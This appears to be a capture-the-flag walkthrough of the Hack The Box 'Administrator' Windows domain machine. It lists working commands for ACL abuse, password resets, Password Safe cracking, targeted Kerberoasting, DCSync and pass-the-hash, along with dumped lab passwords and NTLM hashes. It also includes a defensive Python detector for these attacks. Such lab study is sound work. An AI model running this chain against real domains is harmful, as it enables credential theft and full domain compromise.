Basic information

As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Olivia / ichliebedich

Port scan

Port 21 plus the usual Windows domain ports:

$ nmap -sC -sV -Pn 10.10.11.42
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-11 14:00 CST
Nmap scan report for 10.10.11.42
Host is up (0.075s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-11 12:48:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-11-11T12:48:37
|_ start_date: N/A
|_clock-skew: 6h47m02s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.03 seconds

bloodhound

Run a BloodHound collection with the provided credentials and analyze the results:

10.10.11.42 dc.administrator.htb administrator.htb

bloodhound-python -u Olivia -p ichliebedich -d administrator.htb -c All --zip --dns-tcp -ns 10.10.11.42

Olivia can log in over WinRM:

Olivia also has GenericAll over Michael:

Michael

So abuse GenericAll: the simplest route is to reset the password directly and then log in over WinRM.

Michael in turn has ForceChangePassword over Benjamin:

Benjamin

Change Benjamin's password in the same way:

bloodyAD --host 10.10.11.42 -d Administrator.htb -u Michael -p ichliebedich set password Benjamin ichliebedich

ftp

Benjamin is a member of the SHARE MODERATORS group and can log in to FTP, which yields a Backup.psafe3 file:

Password Safe

.psafe3 is a Password Safe database; Password Safe is a password manager similar to KeePass:

Cracking it works much the same way:

pwsafe2john Backup.psafe3 > hash.txt

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

tekieromucho

Open the psafe3 file with the recovered master password to obtain the stored passwords:

alexander UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma WwANQWnmJnGV07WQN8bMS7FMAbjNur

emily & user flag

emily can log in over WinRM; the user flag is on the Desktop.

evil-winrm -i 10.10.11.42 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Privilege escalation information

From here the path is clear: emily has GenericWrite over ethan, and ethan can DCSync:

ETHAN

Write an SPN onto the account, then Kerberoast it:

python3 targetedKerberoast.py -d Administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb --request-user ethan --dc-ip 10.10.11.42

sudo hashcat -m 13100 hash.txt ~/Tools/dict/rockyou.txt

limpbizkit

dcsync

ethan can DCSync:

python3 examples/secretsdump.py ethan:limpbizkit@10.10.11.42 -just-dc-ntlm -just-dc-user Administrator

3dc553ce4b9fd20bd016e098d2d2fd2e
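Both the targeted Kerberoast above and the DCSync step leave distinctive traces in the domain controller's Security log. As an added example (not part of the original writeup), this Python triage flags them on constructed sample events: a successful 4769 TGS request with RC4 (0x17) for a user-account SPN, and a 4662 access requesting the DS-Replication-Get-Changes rights from a non-DC account. The simplified key=value log format, the sample lines and the "machine accounts end in $" assumption are mine.

```python
# Extended-rights GUIDs on the domain object that DRSUAPI replication (what secretsdump -just-dc uses) requires.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DCSYNC_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Constructed sample events in a simplified "key=value" form, one event per line.
# Not real logs from the box; field names follow the Windows Security log.
SAMPLE_EVENTS = """\
EventID=4662 SubjectUserName=DC$ Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 ObjectType=domainDNS
EventID=4662 SubjectUserName=ethan Properties=1131f6ad-9c07-11d1-f79f-00c04fc2dcd2,1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 ObjectType=domainDNS
EventID=4769 TargetUserName=emily@ADMINISTRATOR.HTB ServiceName=ethan TicketEncryptionType=0x17 Status=0x0
EventID=4769 TargetUserName=emily@ADMINISTRATOR.HTB ServiceName=DC$ TicketEncryptionType=0x12 Status=0x0
EventID=4769 TargetUserName=olivia@ADMINISTRATOR.HTB ServiceName=krbtgt TicketEncryptionType=0x17 Status=0x0
"""

def parse_event(line):
    """Turn one 'k=v k=v' line into a dict (values carry no spaces in this toy format)."""
    return dict(field.split("=", 1) for field in line.split())

def is_dcsync(ev):
    """4662 requesting a replication extended right from a non-machine account.
    Assumption: only DC machine accounts (names ending in '$') replicate legitimately;
    a real deployment would also allow-list known sync accounts (e.g. Entra Connect)."""
    if ev.get("EventID") != "4662":
        return False
    requested = {g.strip().lower() for g in ev.get("Properties", "").split(",")}
    return bool(requested & DCSYNC_GUIDS) and not ev.get("SubjectUserName", "").endswith("$")

def is_user_spn_rc4_tgs(ev):
    """Successful 4769 for a user-account SPN with RC4-HMAC (0x17): the Kerberoast signature.
    Machine accounts ('$') and krbtgt are excluded; AES-only service accounts never match."""
    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
        return False
    svc = ev.get("ServiceName", "")
    return (ev.get("TicketEncryptionType", "").lower() == "0x17"
            and not svc.endswith("$") and svc.lower() != "krbtgt")

def triage(log_text):
    """Return (alert_type, principal) pairs for every suspicious event in the log."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if is_dcsync(ev):
            alerts.append(("dcsync", ev["SubjectUserName"]))
        elif is_user_spn_rc4_tgs(ev):
            alerts.append(("kerberoast", ev["ServiceName"]))
    return alerts

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))  # → [('dcsync', 'ethan'), ('kerberoast', 'ethan')]
```

On a real DC, 4662 only fires if object-access auditing (SACL) is enabled on the domain head, and 4769 needs Kerberos service ticket auditing turned on.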

root flag

Log in with the recovered Administrator hash:

evil-winrm -i 10.10.11.42 -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

hashdump

$ python3 examples/secretsdump.py ethan:limpbizkit@10.10.11.42 -just-dc-ntlm
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:fca453a5e95a98ab61a2cf00302a0431:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:fca453a5e95a98ab61a2cf00302a0431:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Cleaning up...

References